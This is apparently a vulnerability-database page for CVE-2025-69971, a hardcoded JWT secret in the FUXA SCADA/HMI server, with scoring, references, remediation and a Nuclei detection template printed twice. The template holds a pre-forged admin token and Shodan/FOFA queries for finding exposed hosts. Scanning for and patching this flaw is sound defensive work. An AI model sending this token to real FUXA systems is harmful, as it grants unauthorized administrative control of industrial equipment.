FUXA <= 1.2.7 - Hardcoded JWT Secret Authentication Bypass

CVE-2025-69971

Verified

Description

FUXA v1.2.7 contains a hardcoded credentials vulnerability caused by use of a hard-coded secret key in server/api/jwt-helper.js, letting remote attackers forge admin tokens and bypass authentication, exploit requires no special conditions.

Severity

Critical

CVSS Score

9.8

Exploit Probability

Affected Product

fuxa

Published Date

February 15, 2026

Template Author

trader642

CVE-2025-69971.yaml

id: CVE-2025-69971

info:
  name: FUXA <= 1.2.7 - Hardcoded JWT Secret Authentication Bypass
  author: trader642
  severity: critical
  description: |
    FUXA v1.2.7 contains a hardcoded credentials vulnerability caused by use of a hard-coded secret key in server/api/jwt-helper.js, letting remote attackers forge admin tokens and bypass authentication, exploit requires no special conditions.
  impact: |
    Remote attackers can bypass authentication and gain full administrative access.
  remediation: |
    Update to the latest version that removes hard-coded credentials.
  reference:
    - https://github.com/frangoteam/FUXA/security/advisories/GHSA-32cc-x95p-fxcg
    - https://nvd.nist.gov/vuln/detail/CVE-2025-69971
    - https://github.com/frangoteam/FUXA/blob/master/server/api/jwt-helper.js
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-69971
    epss-score: 0.04529
    epss-percentile: 0.89291
    cwe-id: CWE-321
    cpe: cpe:2.3:a:frangoteam:fuxa:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: frangoteam
    product: fuxa
    fofa-query: title="FUXA"
    shodan-query: title:"FUXA"
  tags: cve,cve2025,fuxa,frangoteam,auth-bypass,hardcoded-credentials,jwt,scada,vuln

http:
  - raw:
      - |
        GET /api/project HTTP/1.1
        Host: {{Hostname}}
        x-access-token: eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJpZCI6ICJhZG1pbiIsICJncm91cHMiOiBbLTEsIDI1NV0sICJpYXQiOiAxNzAwMDAwMDAwLCAiZXhwIjogMjAwMDAwMDAwMH0.WEOs0b8pyK8Q7IoQtN3fpc0x0KlAKMAm78oPR9zg2Cg

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "\"hmi\"", "\"server\"", "FuxaServer")'
        condition: and
# digest: 4a0a0047304502202993ce9a0e4e89329444b44e18e671b06acab5390f6d2102d3823f98d9e740a0022100902a6a8c7c806ba08e0abe253d505562f62c45ea7e0852fa9c00f3f0fae73ef5:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2025-69971

CWE ID:

cwe-321

References

https://github.com/frangoteam/FUXA/security/advisories/GHSA-32cc-x95p-fxcg https://nvd.nist.gov/vuln/detail/CVE-2025-69971 https://github.com/frangoteam/FUXA/blob/master/server/api/jwt-helper.js

Remediation Steps

Update to the latest version that removes hard-coded credentials.

id: CVE-2025-69971

info:
  name: FUXA <= 1.2.7 - Hardcoded JWT Secret Authentication Bypass
  author: trader642
  severity: critical
  description: |
    FUXA v1.2.7 contains a hardcoded credentials vulnerability caused by use of a hard-coded secret key in server/api/jwt-helper.js, letting remote attackers forge admin tokens and bypass authentication, exploit requires no special conditions.
  impact: |
    Remote attackers can bypass authentication and gain full administrative access.
  remediation: |
    Update to the latest version that removes hard-coded credentials.
  reference:
    - https://github.com/frangoteam/FUXA/security/advisories/GHSA-32cc-x95p-fxcg
    - https://nvd.nist.gov/vuln/detail/CVE-2025-69971
    - https://github.com/frangoteam/FUXA/blob/master/server/api/jwt-helper.js
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-69971
    epss-score: 0.04529
    epss-percentile: 0.89291
    cwe-id: CWE-321
    cpe: cpe:2.3:a:frangoteam:fuxa:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: frangoteam
    product: fuxa
    fofa-query: title="FUXA"
    shodan-query: title:"FUXA"
  tags: cve,cve2025,fuxa,frangoteam,auth-bypass,hardcoded-credentials,jwt,scada,vuln

http:
  - raw:
      - |
        GET /api/project HTTP/1.1
        Host: {{Hostname}}
        x-access-token: eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJpZCI6ICJhZG1pbiIsICJncm91cHMiOiBbLTEsIDI1NV0sICJpYXQiOiAxNzAwMDAwMDAwLCAiZXhwIjogMjAwMDAwMDAwMH0.WEOs0b8pyK8Q7IoQtN3fpc0x0KlAKMAm78oPR9zg2Cg

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "\"hmi\"", "\"server\"", "FuxaServer")'
        condition: and
# digest: 4a0a0047304502202993ce9a0e4e89329444b44e18e671b06acab5390f6d2102d3823f98d9e740a0022100902a6a8c7c806ba08e0abe253d505562f62c45ea7e0852fa9c00f3f0fae73ef5:922c64590222798bb761d5b6d8e72950

FUXA <= 1.2.7 - Hardcoded JWT Secret Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

FUXA <= 1.2.7 - Hardcoded JWT Secret Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps